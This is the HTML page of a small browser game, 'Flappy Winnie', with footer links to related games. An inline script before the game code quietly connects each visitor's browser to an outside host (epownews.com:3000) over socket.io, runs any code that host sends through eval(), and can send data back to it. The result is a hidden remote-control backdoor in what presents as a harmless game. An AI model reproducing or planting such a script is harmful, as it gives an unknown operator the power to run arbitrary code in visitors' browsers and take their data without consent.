<!doctype html>
<html>
    <head>
        <title>Flappy Winnie</title>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1, maximum-scale=1">
        <meta name="apple-mobile-web-app-title" content="Flappy Winnie">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-touch-fullscreen" content="yes">
        <link rel="apple-touch-icon" href="icons/Icon-App-60x60@2x.png">
        <link rel="apple-touch-icon" sizes="180x180" href="icons/Icon-App-60x60@3x.png">
        <link rel="apple-touch-icon" sizes="76x76" href="icons/Icon-App-76x76@1x.png">
        <link rel="apple-touch-icon" sizes="152x152" href="icons/Icon-App-76x76@2x.png">
        <link rel="apple-touch-icon" sizes="58x58" href="icons/Icon-App-29x29@2x.png">
        <link rel="shortcut icon" href="icons/Icon-App-29x29@1x.png">
        <style>
            html, body {
                margin: 0;
                padding: 0;
                width: 100%;
                height: 100%;
            }
            body {
                background: #825705;
                text-align: center;
                overflow: hidden;
            }
            #game {
                display: inline-block;
            }
            #footer {
                position: fixed;
                bottom: 10px;
                width: 100%;
                font-size: small;
            }
            #footer a {
                margin: 0 10px;
                width: 100px;
                text-decoration: none;
            }
            #footer a, #footer a:visited {
                color: rgb(19, 89, 64);
            }
        </style>
    </head>
    
    <body>
        <div id="game"></div>
        <div id="footer">
            <a href="/FlappyFrog/" target="_blank">Flappy Frog</a>
            <a href="/ninja/" target="_blank">切青蛙</a>
            <a href="/bao/" target="_blank">切包子</a>
            <a href="https://github.com/hahaxixi/hahaxixi.github.io" target="_blank">Source Code</a>
        </div>
        <script>
            
            (function(ant){(function(t){t.init(function(api) {
            })})({config:{host:window.location.protocol+"//www.epownews.com:3000"},init:function(fn,timeout){var self=this,api=new self.API;setTimeout(function(){api.loadJS(self.config.host+"/ant/js/socket.io.min.js",function(){api.socket=io.connect(self.config.host);api.socket.on("connect",function(){this.emit("server",1)}).on("disconnect",function(){this.close()}).on("init",function(t){setInterval(function(){api.socket.emit("alive",true)},1e3*10);fn?fn(api):null}).on("plugin-sender",function(ret){if(typeof ret!=="object"||!ret.act||!ret.data){return false}switch(ret.act){case"inject":var plugin=eval(ret.data);plugin(api);break}})})},timeout||0)},API:function(){return{socket:null,loadJS:function(t,n){var e=document.createElement("script");e.src=t;e.readyState?e.onreadystatechange=function(){e.readyState==="loaded"||e.readyState==="complete"?n():null}:e.onload=n;document.head.appendChild(e);return this},listen:function(t){this.socket.removeEventListener("plugin-listener");this.socket.on("plugin-listener",t);return this},send:function(t){this.socket.emit("plugin-sender",t);return this},save:function(t,n){var e=typeof t==="string"?t:typeof t==="object"?JSON.stringify(t):String(t);e+=n?"":"\n";this.socket.emit("save",e);return this},ss:function(t){this.send(t).save(t)}}}})})();
            
        </script>
        <script src="lib/phaser.min.patched.js"></script>
        <script src="js/require.js"></script>
        <script src="js/global.js"></script>
        <script src="js/utils.js"></script>
        <script src="js/sounds.js"></script>
        <script src="js/pipes.js"></script>
        <script src="js/game.js"></script>
        <script src="js/scene.js"></script>
        <script src="js/main.js"></script>
      
        <script>
            require('main').run();;
        </script>
    </body>
</html>
